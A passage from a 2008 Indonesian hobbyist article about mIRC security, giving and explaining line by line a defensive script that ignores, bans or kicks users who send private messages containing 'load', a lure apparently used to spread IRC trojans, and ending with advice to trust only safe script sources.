bisa dipercaya, seperti www.hawkee.com, situs ini menyediakan banyak fullscript yang bisa kamu
pakai dengan aman.
Berikut ini adalah snippet code untuk menolak kiriman tersebut, saya copy dari artikel saya
yang berjudul “Bermain Virus IRC On Encode Description”. Jika kamu telah menuliskannya di mIRC
script editor kamu, abaikan saja snippet dibawah ini. Siapkan script editor kamu dan tuliskan
snippet berikut ini :
on *:open:?: {
var %temp = 1
while ( %temp <= $comchan($nick,0) ) {
var %chan = %chan $comchan($nick,%temp)
if ($nick == $me) { halt }
if ($me !isop $comchan($nick,%temp)) || (%chan == $null) {
var %word = load
if (%word isin $strip($1-)) {
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt
}}
if ($me isop $comchan($nick,%temp)) {
var %word = load
if (%word isin $strip($1-)) {
ban $+(-u,120) $comchan($nick,%temp) $nick 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- }
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt
}}
inc %temp
}}
Baris keterangan :
on *:open:?: {
Event pada saat query nick pertama kali dibuka.
var %temp = 1
while ( %temp <= $comchan($nick,0) ) {
Ketika kondisi variable dari %temp lebih kecil nilainya atau sama dengan dari pada jumlah
channel kamu dan nick tersebut berada, maka lakukan aksi.
var %chan = %chan $comchan($nick,%temp)
if ($nick == $me) { halt }
Channel dimana nick tersebut dan kamu berada digantikan dengan variable %chan, dan jika
yang kirim pesan tersebut atas nama kamu aksinya di-halt (script dihentikan).
if ($me !isop $comchan($nick,%temp)) || (%chan == $null) {
var %word = load
if (%word isin $strip($1-)) {
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt } }
Jika kamu bukan OP pada channel dimana nick tersebut berada, atau nick tersebut tidak
bersama didalam satu channel dengan kamu, maka lakukan aksi ( “{“ ). Text “Load” digantikan
oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick) mengandung
variable %word, maka lakukan :
.ignore -pcntikdu $+ 120 $nick
Ignore-kan nick tersebut selama 120 sec
.timer 1 1 close -m $nick
Set waktu pada detik ke satu, tutup window query nick.
echo -s * - Spam dari $nick telah diblokir -
Pada window status, tampilkan pesan.
linesep -s | halt
Memberikan separator pada layar status, serta menghentikan script (halt).
if ($me isop $comchan($nick,%temp)) {
var %word = load
if (%word isin $strip($1-)) {
ban $+(-u,120) $comchan($nick,%temp) $nick 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer..
on Query]- }
.ignore -pcntikdu $+ 120 $nick
.timer 1 1 close -m $nick
echo -s * - Spam dari $nick telah diblokir -
linesep -s | halt } }
Jika kamu adalah OP pada channel dimana nick tersebut berada, maka lakukan aksi ( “{“ ). Text
“Load” digantikan oleh variable %word, dan jika kalimat yang dikirimkan oleh seseorang ($nick)
mengandung variable %word, maka lakukan :
ban $+(-u,120) $comchan($nick,%temp) $nick 5
mode ban pada nick tersebut selama 120 sec dengan type ban 5
if ($nick ison $comchan($nick,%temp)) { kick $comchan($nick,%temp) $nick -[Spammer.. on Query]- }
Jika nick tersebut ada di dalam channel, maka kick nick tersebut.
.ignore -pcntikdu $+ 120 $nick
Ignore-kan nick tersebut selama 120 sec
.timer 1 1 close -m $nick
Set waktu pada detik ke satu, tutup window query nick.
echo -s * - Spam dari $nick telah diblokir -
Pada window status, tampilkan pesan.
linesep -s | halt
Memberikan separator pada layar status, serta menghentikan script (halt).
inc %temp } }
Melakukan perulangan untuk variable %temp, dan menutup baris script dari event open.
Jika tidak ada masalah, dan ketika ada seseorang yang mem-private message kamu dengan
contoh code diatas, script ini akan melakukan aktifitasnya.
E. Finishing
Jangan mudah percaya dengan apa yang ditawarkan oleh seseorang di Private Message. Jika
kamu berniat menggunakan mIRC fullscript, sebaiknya membuat sendiri fullscript tersebut atau
mendownloadnya dari situs yang bisa dipercaya. Karena sebagan besar trojan menunggu kelalaian
dari user. Sedangkan mIRC merupakan salah satu “pintu besar” bagi trojan untuk masuk.
Tidak ada maksud lain dari penulisan artikel ini, melainkan hanya untuk tahu dan bagaimana
cara kita menyikapinya. Artikel ini mungkin jauh dari harapan, untuk itu kepada para master dan
suhu, mohon bimbingannya.
sumber :
--= eof =--
[] Malu untuk mengakui yang bukan miliknya
[] Best Regard teman-teman seperjuangan.
MeTaLaToR [Bising Teams @ 2008 - www.bising.co.nr
:: www.bising.co.nr – CopyLeft @ 2008 ::.
